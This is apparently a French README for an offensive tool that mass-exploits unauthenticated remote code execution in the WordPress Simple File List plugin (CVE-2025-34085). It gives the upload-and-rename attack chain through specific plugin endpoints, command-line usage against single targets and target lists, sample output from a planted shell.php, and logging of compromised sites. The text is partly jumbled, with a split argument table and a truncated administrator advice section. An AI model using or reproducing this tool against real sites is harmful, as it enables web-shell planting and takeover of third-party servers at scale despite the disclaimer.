
Outil automatisé pour détecter et exploiter les exécutions de code à distance (RCE) non authentifiées sur le plugin WordPress Simple File List, en particulier celles vulnérables à CVE-2025-34085.
Doté d'un système de nettoyage automatique des cibles et d'un support multithread pour une efficacité à grande échelle.
Upload de fichier sans authentification
/wp-content/plugins/simple-file-list/ee-upload-engine.phpRenommage du fichier en .php
/wp-content/plugins/simple-file-list/ee-file-engine.phpExécution du payload à distance
python3 main.py -u http://target.com --cmd "id"
Placez la liste des cibles dans le fichier targets.txt, une par ligne :
python3 main.py --cmd "uname -a"
| Argument | Description |
|---|---|
-u | Cible unique (exemple : ) |
[+] http://target.com | http://target.com/wp-content/uploads/simple-file-list/shell.php
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Les cibles exploitées avec succès sont automatiquement enregistrées dans le fichier vuln.txt.
main.py — Script principaltargets.txt — Liste des ciblesclean_targets.txt — Résultat de la normalisation des URLvuln.txt — Journal des cibles exploitées avec succèstargets.txtLes administrateurs de sites WordPress sont invités à :
Ce projet est uniquement destiné à l'apprentissage et aux tests légitimes.
L'utilisation à des fins illégales relève de la responsabilité de chaque individu.
Cyberlone Indonesia n'est pas responsable de l'utilisation abusive de cet outil.
Licence : MIT License
N'hésitez pas à l'utiliser, le modifier et le distribuer librement à des fins légitimes et responsables.
Cyberlone Indonesia
🛠️ Équipe de recherche & d'exploitation
🔗 GitHub : https://github.com/yukinime
👨💻 0xgh057r3c0n
🔗 GitHub : github.com/0xgh057r3c0n
http://example.com--cmd | Commande à exécuter sur la cible (défaut : id) |
--inline | Utiliser un payload inline (sans paramètre ?cmd=) |